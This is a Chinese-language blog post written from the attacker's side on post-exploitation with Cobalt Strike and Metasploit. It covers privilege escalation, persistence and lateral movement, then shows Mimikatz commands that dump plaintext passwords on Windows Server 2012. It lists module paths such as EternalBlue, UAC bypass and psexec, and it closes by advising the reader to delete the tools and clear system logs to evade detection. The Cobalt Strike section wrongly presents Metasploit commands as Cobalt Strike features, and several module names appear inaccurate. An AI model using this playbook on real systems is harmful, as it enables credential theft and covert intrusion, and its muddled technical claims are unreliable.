cs与msf权限传递,以及mimikatz抓取win2012明文密码

Cobalt Strike的权限提升

在进行权限提升之前,攻击者需要首先获得目标系统的初始访问权限。这通常通过以下几种方式实现:网络钓鱼,漏洞利用,社会工程学。

成功获取初始访问权限后,攻击者会在目标系统上植入一个Cobalt Strike Beacon,这是一种后门工具,用于与Cobalt Strike服务器通信。

提升权限

在拥有初始访问权限后,下一步是提升权限。Cobalt Strike提供了多种提升权限的方法,包括:漏洞利用:利用操作系统或应用程序中的已知漏洞进行权限提升。

复制代码
run post/windows/manage/steal_token
run post/windows/manage/inject_into_process

建立持久性

为了确保持续访问目标系统,攻击者会建立持久性。Cobalt Strike提供了多种方法。

复制代码
run post/windows/manage/persistence_exe
run post/windows/manage/install_service

横向移动

权限提升和持久性建立后,攻击者通常会在网络中横向移动,以获取更多系统的访问权限。常用的方法包括:凭证盗窃(MinmiKatz工具)可以从当前系统中提取其他系统的凭证,远程命令执行(通过WMI工具)在其他系统上远程执行命令。

复制代码
run post/windows/manage/wmi_exec

MSF的权限提升

获取初试访问权限

与Cobalt Strike类似,MSF同样需要首先获取目标系统的初始访问权限。常见的方法包括网络钓鱼,漏洞利用,社会工程学。

提升权限

在拥有初始访问权限后,MSF提供了多种提升权限的方法。

复制代码
use exploit/windows/smb/ms17_010_eternalblue
 
use exploit/windows/local/bypassuac
 
post/windows/manage/steal_token

建立持久性

复制代码
run persistence
run post/windows/manage/persistence

横向移动

MSF的横向移动与CS类似

复制代码
post/windows/gather/credentials/mimikatz
exploit/windows/smb/psexec

在win2012上使用Mimikatz

获取系统访问权限

首先,攻击者需要获取目标系统的访问权限。这通常通过CS或MSF等工具实现。成功获取访问权限后,攻击者可以将Mimikatz上传到目标系统。

加载Mimikatz

将Mimikatz上传到目标系统后,可以通过命令行加载并执行Mimikatz

提取明文密码

在Mimikatz中执行以下命令以提取明文密码

复制代码
privilege::debug
sekurlsa::logonpasswords

清理痕迹

执行完成后,及时清理Mimikatz及相关痕迹,以避免被检测。例如,可以删除上传的Mimikatz文件,并清理系统日志

相关推荐
188号安全攻城狮20 小时前
【前端安全】Trusted Types 全维度技术指南:CSP 原生 DOM XSS 防御终极方案
前端·安全·网络安全·xss
婷婷_17220 小时前
DWC Ethernet QoS VLAN高级功能深度解析
网络·学习·程序人生·ethernet·芯片·vlan·gmac
Hello.Reader20 小时前
双卡 A100 + Ollama 最终落地手册一键部署脚本、配置文件、预热脚本与 Python 客户端完整打包
开发语言·网络·python
一名优秀的码农21 小时前
vulhub系列-56-Matrix-Breakout: 2 Morpheus(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
七夜zippoe21 小时前
应用安全实践(二):Spring Security核心流程与OAuth 2.0授权
java·安全·spring·security·oauth 2.0
派大星酷21 小时前
Java 网络编程全解:TCP、UDP、HTTP、WebSocket
java·网络·tcp/ip
jinanwuhuaguo21 小时前
OpenClaw、Agent、Skill、MCP 深度解读与区分分析
网络·人工智能·网络协议·rpc·openclaw
liulilittle21 小时前
静态隧道 UDP 限制与绕过:以 DMIT 机房为例
网络·网络协议·udp
陈天伟教授21 小时前
如何选择云端 CI/CD 平台
人工智能·安全·机器学习
minji...21 小时前
Linux 多线程(四)线程等待,线程分离,线程管理,C++多线程,pthread库
linux·运维·开发语言·网络·c++·算法